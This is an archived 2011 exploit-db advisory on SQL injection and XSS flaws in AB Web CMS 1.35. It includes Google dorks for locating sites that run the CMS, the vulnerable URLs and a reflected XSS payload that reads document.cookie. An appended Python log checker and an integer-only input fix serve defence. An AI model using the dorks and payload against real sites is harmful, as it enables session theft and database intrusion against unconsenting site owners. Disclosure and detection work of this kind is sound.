ab Web CMS 1.35 – Multiple Vulnerabilities

  • Author: Dr.0rYX & Cr3W-DZ
    Date: 2011-01-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16044/
  • ALGERIAN HACKERS - NORTH-AFRICA SECURITY TEAM
     
    [!]AB WEB CMS V.1.35 Multiple Remote Vulnerabilities 
    [!] Author: Dr.0rYX and Cr3w-DZ
    [!] MAIL: sniper-dz@hotmail.de & Cr3w@hotmail.de
    [!] greet to:WWW.GAZA-HACKER.NET
    
    ***************************************************************************/
     
    
    [ Software Information ]
     
    [+] Vendor : http://www.aeline-informatique.com/
    [+] script : AB WEB V.1.35 
    [+] Download : http://www.aeline-informatique.com/contact.php/ (commercial script)
    [+] Vulnerability : SQL injection / XSS Vulnerability 
    [+] Dork : inurl:"ab_fct.php?fct="
     inurl:" ab_gp_detail.php?id_det="
     
    **************************************************************************/
    [ Vulnerable File 1]
    
    
    http://server/[path]/ab_gp_detail.php?id_det=sql[N.A.S.T ] 
    
    [path] : fr , de 
    
    [ Exploit 1 ]
    
    
    http://server/fr/ab_gp_detail.php?id_det=SQL INJECTION 
     
    *************************************************************************/
    
    [ Vulnerable File 2]
    
    http://server/fr/ab_gp_detail.php?id_det=xss[N.A.S.T ]
    
    [ Exploit 2 ]
    
    http://www.server/fr/ab_gp_detail.php?id_det='><script>alert(document.cookie)</script>
    
    [GReet ]
     
    [+] :WWW.Gaza-hacker.net ,WWW.evilzone.org , WWW.sec4ever.com , Exploit-db.com , ALL HACKERS MUSLIMS
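
For sites still running this script, the log check below flags requests to ab_gp_detail.php whose id_det value is not a plain integer, which covers both issues reported above. It is an added example, not part of the original advisory or the vendor's code; the log lines are constructed, and treating id_det as a numeric record id is an assumption the advisory does not confirm.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format), not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Jan/2011:10:00:01 +0000] "GET /fr/ab_gp_detail.php?id_det=12 HTTP/1.1" 200 5120
198.51.100.8 - - [25/Jan/2011:10:00:05 +0000] "GET /de/ab_gp_detail.php?id_det=12%27 HTTP/1.1" 200 310
198.51.100.9 - - [25/Jan/2011:10:00:09 +0000] "GET /fr/ab_gp_detail.php?id_det=%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4000
198.51.100.7 - - [25/Jan/2011:10:00:12 +0000] "GET /fr/index.php HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return None for a plain integer id, else a coarse reason string."""
    # Assumption: id_det is a numeric record id (the advisory does not say).
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if re.search(r"[<>]", value):
        return "markup"
    if re.search(r"['\"]|--|\b(union|select)\b", value, re.IGNORECASE):
        return "sqli-like"
    return "non-numeric"


def find_suspicious(log_text):
    """Return (client, path, reason) for odd id_det values on ab_gp_detail.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/ab_gp_detail.php"):
            continue
        # parse_qs percent-decodes, so encoded quotes and brackets are seen.
        for value in parse_qs(url.query, keep_blank_values=True).get("id_det", []):
            reason = classify(value)
            if reason:
                hits.append((client, url.path, reason))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
```

The same integer-only rule, enforced server-side before the value reaches the query or the page output, is the corresponding fix for both findings.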